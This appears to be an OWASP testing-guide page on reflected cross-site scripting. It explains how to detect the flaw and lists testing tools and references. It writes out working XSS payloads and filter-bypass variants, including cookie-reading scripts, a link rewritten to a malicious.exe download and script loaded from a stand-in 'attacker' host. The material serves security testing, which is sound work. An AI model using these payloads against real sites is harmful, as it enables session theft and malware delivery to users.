## Summary

Reflected [Cross-site Scripting
(XSS)](Cross-site_Scripting_\(XSS\) "wikilink") occur when an attacker
injects browser executable code within a single HTTP response. The
injected attack is not stored within the application itself; it is
non-persistent and only impacts users who open a maliciously crafted
link or third-party web page. The attack string is included as part of
the crafted URI or HTTP parameters, improperly processed by the
application, and returned to the victim.

Reflected XSS are the most frequent type of XSS attacks found in the
wild. Reflected XSS attacks are also known as non-persistent XSS attacks
and, since the attack payload is delivered and executed via a single
request and response, they are also referred to as first-order or type 1
XSS.

When a web application is vulnerable to this type of attack, it will
pass unvalidated input sent through requests back to the client. The
common modus operandi of the attack includes a design step, in which the
attacker creates and tests an offending URI, a social engineering step,
in which she convinces her victims to load this URI on their browsers,
and the eventual execution of the offending code using the victim's
browser.

Commonly the attacker's code is written in the Javascript language, but
other scripting languages are also used, e.g., ActionScript and
VBScript. Attackers typically leverage these vulnerabilities to install
key loggers, steal victim cookies, perform clipboard theft, and change
the content of the page (e.g., download links).

One of the primary difficulties in preventing XSS vulnerabilities is
proper character encoding. In some cases, the web server or the web
application could not be filtering some encodings of characters, so, for
example, the web application might filter out "

<script>

", but might not filter %3cscript%3e which simply includes another
encoding of tags.

## How to Test

### Black Box testing

A black-box test will include at least three phases:

1\. Detect input vectors. For each web page, the tester must determine
all the web application's user-defined variables and how to input them.
This includes hidden or non-obvious inputs such as HTTP parameters, POST
data, hidden form field values, and predefined radio or selection
values. Typically in-browser HTML editors or web proxies are used to
view these hidden variables. See the example below.

2\. Analyze each input vector to detect potential vulnerabilities. To
detect an XSS vulnerability, the tester will typically use specially
crafted input data with each input vector. Such input data is typically
harmless, but trigger responses from the web browser that manifests the
vulnerability. Testing data can be generated by using a web application
fuzzer, an automated predefined list of known attack strings, or
manually.
Some example of such input data are the following:

    <script>alert(123)</script>

    â€œ><script>alert(document.cookie)</script>

For a comprehensive list of potential test strings, see the [XSS Filter
Evasion Cheat Sheet](XSS_Filter_Evasion_Cheat_Sheet "wikilink").

3\. For each test input attempted in the previous phase, the tester will
analyze the result and determine if it represents a vulnerability that
has a realistic impact on the web application's security. This requires
examining the resulting web page HTML and searching for the test input.
Once found, the tester identifies any special characters that were not
properly encoded, replaced, or filtered out. The set of vulnerable
unfiltered special characters will depend on the context of that section
of HTML.

Ideally all HTML special characters will be replaced with HTML entities.
The key HTML entities to identify are:

    > (greater than)
    < (less than)
    & (ampersand)
    ' (apostrophe or single quote)
    " (double quote)

However, a full list of entities is defined by the HTML and XML
specifications. Wikipedia has a complete reference
[1](http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references).

Within the context of an HTML action or JavaScript code, a different set
of special characters will need to be escaped, encoded, replaced, or
filtered out. These characters include:

    \n (new line)
    \r (carriage return)
    \' (apostrophe or single quote)
    \" (double quote)
    \\ (backslash)
    \uXXXX (unicode values)

For a more complete reference, see the Mozilla JavaScript guide.
[2](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Values,_variables,_and_literals#Using_special_characters_in_strings)

#### Example 1

For example, consider a site that has a welcome notice " Welcome
%username% " and a download link.

![Image:XSS Example1.png](XSS_Example1.png "Image:XSS Example1.png")

The tester must suspect that every data entry point can result in an XSS
attack. To analyze it, the tester will play with the user variable and
try to trigger the vulnerability.

Let's try to click on the following link and see what happens:

    http://example.com/index.php?user=<script>alert(123)</script>

If no sanitization is applied this will result in the following popup:

![Image:alert.png](alert.png "Image:alert.png")

This indicates that there is an XSS vulnerability and it appears that
the tester can execute code of his choice in anybody's browser if he
clicks on the tester's link.

#### Example 2

Let's try other piece of code (link):

    http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");
    AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>

This produces the following behavior:

![Image:XSS Example2.png](XSS_Example2.png "Image:XSS Example2.png")

This will cause the user, clicking on the link supplied by the tester,
to download the file malicious.exe from a site he controls.

### Bypass XSS filters

Reflected cross-site scripting attacks are prevented as the web
application sanitizes input, a web application firewall blocks malicious
input, or by mechanisms embedded in modern web browsers. The tester must
test for vulnerabilities assuming that web browsers will not prevent the
attack. Browsers may be out of date, or have built-in security features
disabled. Similarly, web application firewalls are not guaranteed to
recognize novel, unknown attacks. An attacker could craft an attack
string that is unrecognized by the web application firewall.

Thus, the majority of XSS prevention must depend on the web
application's sanitization of untrusted user input. There are several
mechanisms available to developers for sanitization, such as returning
an error, removing, encoding, or replacing invalid input. The means by
which the application detects and corrects invalid input is another
primary weakness in preventing XSS. A blacklist may not include all
possible attack strings, a whitelist may be overly permissive, the
sanitization could fail, or a type of input may be incorrectly trusted
and remain unsanitized. All of these allow attackers to circumvent XSS
filters.

The [XSS Filter Evasion Cheat
Sheet](XSS_Filter_Evasion_Cheat_Sheet "wikilink") documents common
filter evasion tests.

#### Example 3: Tag Attribute Value


Since these filters are based on a blacklist, they could not block every
type of expressions. In fact, there are cases in which an XSS exploit
can be carried out without the use of

<script>

tags and even without the use of characters such as " \< \> and / that
are commonly filtered.

For example, the web application could use the user input value to fill
an attribute, as shown in the following code:

    <input type="text" name="state" value="INPUT_FROM_USER">

Then an attacker could submit the following code:

    " onfocus="alert(document.cookie)

#### Example 4: Different syntax or encoding


In some cases it is possible that signature-based filters can be simply
defeated by obfuscating the attack. Typically you can do this through
the insertion of unexpected variations in the syntax or in the
enconding. These variations are tolerated by browsers as valid HTML when
the code is returned, and yet they could also be accepted by the filter.

Following some examples:

    "><script >alert(document.cookie)</script >

    "><ScRiPt>alert(document.cookie)</ScRiPt>

    "%3cscript%3ealert(document.cookie)%3c/script%3e

#### Example 5: Bypassing non-recursive filtering


Sometimes the sanitization is applied only once and it is not being
performed recursively. In this case the attacker can beat the filter by
sending a string containing multiple attempts, like this one:

    <scr<script>ipt>alert(document.cookie)</script>

#### Example 6: Including external script


Now suppose that developers of the target site implemented the following
code to protect the input from the inclusion of external script:

    <?
       $re = "/<script[^>]+src/i";

       if (preg_match($re, $_GET['var']))
       {
          echo "Filtered";
          return;
       }
       echo "Welcome ".$_GET['var']." !";
    ?>

In this scenario there is a regular expression checking if <b>\<script
\[anything but the character: '\>' \] src</b> is inserted. This is
useful for filtering expressions like

    <script src="http://attacker/xss.js"></script>

which is a common attack. But, in this case, it is possible to bypass
the sanitization by using the "\>" character in an attribute between
script and src, like this:

    http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>

This will exploit the reflected cross site scripting vulnerability shown
before, executing the javascript code stored on the attacker's web
server as if it was originating from the victim web site,
<http://example/>.

#### Example 7: HTTP Parameter Pollution (HPP)


Another method to bypass filters is the HTTP Parameter Pollution, this
technique was first presented by Stefano di Paola and Luca Carettoni in
2009 at the OWASP Poland conference. See the [Testing for HTTP Parameter
pollution](Testing_for_HTTP_Parameter_pollution_\(OTG-INPVAL-004\) "wikilink")
for more information. This evasion technique consists of splitting an
attack vector between multiple parameters that have the same name. The
manipulation of the value of each parameter depends on how each web
technology is parsing these parameters, so this type of evasion is not
always possible. If the tested environment concatenates the values of
all parameters with the same name, then an attacker could use this
technique in order to bypass pattern- based security mechanisms.
Regular attack:

    http://example/page.php?param=<script>[...]</script>

Attack using HPP:

    http://example/page.php?param=<script&param=>[...]</&param=script>

''' Result expected '''
See the [XSS Filter Evasion Cheat
Sheet](XSS_Filter_Evasion_Cheat_Sheet "wikilink") for a more detailed
list of filter evasion techniques. Finally, analyzing answers can get
complex. A simple way to do this is to use code that pops up a dialog,
as in our example. This typically indicates that an attacker could
execute arbitrary JavaScript of his choice in the visitors' browsers.

### Gray Box testing

Gray Box testing is similar to Black box testing. In gray box testing,
the pen-tester has partial knowledge of the application. In this case,
information regarding user input, input validation controls, and how the
user input is rendered back to the user might be known by the
pen-tester.

If source code is available (White Box), all variables received from
users should be analyzed. Moreover the tester should analyze any
sanitization procedures implemented to decide if these can be
circumvented.

## Tools

  - **[OWASP CAL9000](OWASP_CAL9000_Project "wikilink")**

CAL9000 is a collection of web application security testing tools that
complement the feature set of current web proxies and automated
scanners. It's hosted as a reference at <https://1337.yehg.net/CAL9000/>
.

  - **PHP Charset Encoder(PCE)** - <http://h4k.in/encoding> \[mirror:
    <http://yehg.net/e> \]

This tool helps you encode arbitrary texts to and from 65 kinds of
charsets. Also some encoding functions featured by JavaScript are
provided.

  - **HackVertor** -
    <http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php>

It provides multiple dozens of flexible encoding for advanced string
manipulation attacks.

  - **[WebScarab](OWASP_WebScarab_Project "wikilink")**

WebScarab is a framework for analysing applications that communicate
using the HTTP and HTTPS protocols.

  - **XSS-Proxy** - <http://xss-proxy.sourceforge.net/>

XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

  - **ratproxy** - <http://code.google.com/p/ratproxy/>

A semi-automated, largely passive web application security audit tool,
optimized for an accurate and sensitive detection, and automatic
annotation, of potential problems and security-relevant design patterns
based on the observation of existing, user-initiated traffic in complex
web 2.0 environments.

  - **Burp Proxy** - <http://portswigger.net/proxy/>

Burp Proxy is an interactive HTTP/S proxy server for attacking and
testing web applications.

  - **OWASP Zed Attack Proxy (ZAP)** -
    [OWASP_Zed_Attack_Proxy_Project](OWASP_Zed_Attack_Proxy_Project "wikilink")

ZAP is an easy to use integrated penetration testing tool for finding
vulnerabilities in web applications. It is designed to be used by people
with a wide range of security experience and as such is ideal for
developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you
to find security vulnerabilities manually.

  - **OWASP Xenotix XSS Exploit Framework** -
    [OWASP_Xenotix_XSS_Exploit_Framework](OWASP_Xenotix_XSS_Exploit_Framework "wikilink")

OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting
(XSS) vulnerability detection and exploitation framework. It provides
Zero False Positive scan results with its unique Triple Browser Engine
(Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the
worldâ€™s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads
for effective XSS vulnerability detection and WAF Bypass. Xenotix
Scripting Engine allows you to create custom test cases and addons over
the Xenotix API. It is incorporated with a feature rich Information
Gathering module for target Reconnaissance. The Exploit Framework
includes offensive XSS exploitation modules for Penetration Testing and
Proof of Concept creation.

## References

**OWASP Resources**
\*[XSS Filter Evasion Cheat
Sheet](XSS_Filter_Evasion_Cheat_Sheet "wikilink") **Books**
\* Joel Scambray, Mike Shema, Caleb Sima - "Hacking Exposed Web
Applications", Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0

  - Dafydd Stuttard, Marcus Pinto - "The Web Application's Handbook -
    Discovering and Exploiting Security Flaws", 2008, Wiley, ISBN
    978-0-470-17077-9
  - Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov,
    Anton Rager, Seth Fogie - "Cross Site Scripting Attacks: XSS
    Exploits and Defense", 2007, Syngress, ISBN-10: 1-59749-154-3

**Whitepapers**
\* **CERT** - Malicious HTML Tags Embedded in Client Web Requests:
[Read](http://www.cert.org/advisories/CA-2000-02.html)

  - **Rsnake** - XSS Cheat Sheet: [Read](http://ha.ckers.org/xss.html)
  - **cgisecurity.com** - The Cross Site Scripting FAQ:
    [Read](http://www.cgisecurity.com/articles/xss-faq.shtml)
  - **G.Ollmann** - HTML Code Injection and Cross-site scripting:
    [Read](http://www.technicalinfo.net/papers/CSS.html)
  - **A. Calvo, D.Tiscornia** - alert('A javascritp agent'):
    [Read](http://www.coresecurity.com/corelabs-research/publications/alert-a-javascript-agent)
  - **S. Frei, T. DÃ¼bendorfer, G. Ollmann, M. May** - Understanding the
    Web browser threat:
    [Read](http://www.techzoom.net/publications/insecurity-iceberg/index.en)